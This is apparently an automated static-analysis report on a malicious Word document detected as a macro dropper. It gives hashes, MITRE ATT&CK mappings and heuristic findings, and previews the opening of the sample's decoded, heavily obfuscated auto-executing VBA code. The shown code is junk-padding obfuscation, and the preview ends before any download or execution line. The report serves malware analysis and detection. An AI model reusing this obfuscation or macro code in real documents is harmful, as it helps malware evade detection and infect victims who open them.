Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fdd198cd4689c086…

MALICIOUS

Office (OLE)

424.0 KB Created: 2018-07-23 00:23:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: 6667fca73895e5948c9febcc25e2414b SHA-1: ae7c2fca09ad673eee6101dd0a0ffca19d117b42 SHA-256: fdd198cd4689c0869b148cde86e6453303eadb97d062a7e73a8b1112692ecd89
330 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is an Office document containing heavily obfuscated VBA macros. Heuristics indicate the presence of auto-executing macros (Document_Open) that utilize Shell() and CreateObject calls, typical for downloading and executing further malicious content. The ClamAV detection name 'Doc.Dropper.Emodldr-6755244-0' further supports its role as a dropper.

Heuristics 9

  • ClamAV: Doc.Dropper.Emodldr-6755244-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Emodldr-6755244-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 188759 bytes
SHA-256: fdfc570fe2daaf5c5fb9712d0cbe384363c570ce257a821dbecc9246ca08aefd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function iqEZtDe(fvsnelEd As String) As String
kewVP = 630 - 1198 - 1943
For SxbWwN = 0 To 6
    bDEQCuqr = Right("e-hRHM^f.jC?!_", 3)
    HZxhNF = StrReverse("JV)r*[Ez*IPv_kYF&")
    TqXpA = RTrim("u-Qxe.&^VYp.jlR_B")
    HZxhNF = Space(16)
    eSNfgBwRDUE = RTrim("XPIc]-t(YN&V-ml!")
Next SxbWwN
NAMeaCp = Left("Yy-]xIsmqkqHHEGjK(@", 5)
eSNfgBwRDUE = 1536 + 1080 + 1162
bDEQCuqr = 1435 + 1930 + 994
YxjxBnmxvj = UCase("a?CsXhYb]eJ)P")
While fGpAuI < 3
    WFVSiLOGiz = RTrim("$hx&d)F]M?-EWC?_er")
    UZLDSE = Space(10)
    kewVP = "ZcH%N%jPtwj)$T" + "x!FYmKKp$*GW" + "F_Nh)b#NISwXO$bB"
    iwgMvUchTxsU = LTrim("bpcPo(XD-H_Z")
    KrtlNclOmAoo = 1620 - 1310 - 1426
    zMGhAR = LTrim("Yc?YfJEvLFj)_xXcuzTe")
    NAMeaCp = Right("ej$Ch!KLL.@(gfXI yIQ", 5)
    kewVP = Space(17)
    zOQeZCRu = RTrim("]?TeaQ[z(xR")
    fGpAuI = fGpAuI + 3
Wend
    Dim INaVhhYZ() As Byte
    KrtlNclOmAoo = "&CpB*T-uB@]*Uxw" + "HdnX!yD*@_eseBGSg)H" + "^NdfJdJQ%.Oh!"
    For bSLkwR = 0 To 9
        EcfidI = RTrim("eSehLd^slB")
        UZLDSE = 1040 - 1548 - 1296
        HZxhNF = 917 - 1954 - 1873
        bWLduzAeZLW = "TZ[.AeF#CP&BD!b&" + "HEG#njZJ^AZ@EEH" + "k^a.YcjB]R#SfP"
        zMGhAR = StrReverse("#ugWd.hzqPsgim xDB")
        TqXpA = "D^M*FoyU#OAwm[bwhx]s" + "LFrERUbUgyUOlcPC" + "wCjEl do.o_eRGM.[y"
        zOQeZCRu = RTrim("Hf@LjPLrcaFm")
    Next bSLkwR
    For QMcAZz = 0 To 2
        While wzGQev < 3
            zOQeZCRu = RTrim("lOHhoDvaqujxpbs")
            bWLduzAeZLW = LTrim("GqU?(lj-jChB#b%cgQRs")
            Ilfqa = "hGU -JIJ !xh[xG)VqQ" + "#sJ?UyY[pzZ" + "mF[.yfN_Ou^RzHs"
            bDEQCuqr = StrReverse("n^I]WmEEampMrsnh")
            NAMeaCp = UCase("CNL)g)Wn _")
            WFVSiLOGiz = Right("uXQXHLWoT]", 4)
            Ilfqa = 893 + 1887 + 1636
            TqXpA = LTrim("S%qVBsqDWl(w#")
            kewVP = UCase("WycA^aWvtQDR^%(ATox@")
            wzGQev = wzGQev + 2
        Wend

        aESTZiwniR = "D-aPBlpotN]yk]kiN" + "cR%xpddKXIkVaJ*" + "pdAtY]zq.$yr]b"
        PUobpfmGH = 824 + 184 + 864
        PUobpfmGH = StrReverse("pINX(WCPbUDt[uqwMGR")
        aESTZiwniR = Left("thQ.PYLCNN.NayqokE", 2)
        WFVSiLOGiz = Space(16)
        bDEQCuqr = RTrim("vDJFP-A^w!-lqM#")
        WFVSiLOGiz = 666 + 1120 + 139
        PUobpfmGH = RTrim("m*Zr&Ap$Wme ")
        PUobpfmGH = "!JkKiQRG!_UM" + "!Ip*vvJH]." + "kUOp*W]@VFQ-Ji%$$"
        zMGhAR = 947 + 1623 + 1217
    Next QMcAZz
    For oFucHF = 0 To 6
        YxjxBnmxvj = 1198 - 615 - 1571
        zMGhAR = RTrim(")nL-(zHX]XRSW%EFL")
        zMGhAR = LTrim("QcuRpdbCPs?KVkYoh")
        WFVSiLOGiz = LTrim("f)TCdmyB-h")
        EcfidI = 268 - 575 - 790
        Ilfqa = UCase("rJf@VFoWM#RO yD$$bAU")
        KrtlNclOmAoo = RTrim("RuuOPUgOJyL")
        Ilfqa = 1134 + 1620 + 798
    Next oFucHF
    PUobpfmGH = 1936 + 508 + 1098
    For ZWCOai = 0 To 9
        TqXpA = Left("l.QNCdKuKqJl ^!eX", 5)
        kewVP = UCase(")@. &@Elhr^qHDS]Y_@")
    Next ZWCOai
    For aVgYmI = 0 To 9
        eSNfgBwRDUE = Space(2)
        iwgMvUchTxsU = Right("aunoiGHuezVPAgE%", 5)
        KrtlNclOmAoo = StrReverse("zsHtiyZRpb_JEl")
        WFVSiLOGiz = LTrim("VZ#_gzlmaacES@")
        bWLduzAeZLW = LTrim(" _x!!y[DZV(")
        HZxhNF = Right("vjPAFfkDmq?bzACa]Y(", 4)
        iwgMvUchTxsU = Space(18)
    Next aVgYmI
    TqXpA = UCase("ezm[$dVj_Jk.f")
    Dim YUljnw As Integer
    NAMeaCp = Right("].DA-mobum", 4)
    UZLDSE = Right("dfXxI.mMhKF@QHkr[", 4)
    While qnTwWW < 4
        WFVSiLOGiz = Right("Qz@nuSRNgcZic%f", 2)
        EcfidI = UCase("QLhi]Z$#iQ!ZvjuSq.Z")
        eSNfgBwRDUE = StrReverse("NJWu@tGuWk^[h)x[Q !n")
        bWLduzAeZLW = LTrim("bqa$iCP?Y$^")
        eSNfgBwRDUE = Right("nLvnOP?_X#rpj-EOPZ", 3)
        UZLDSE = 733
... (truncated)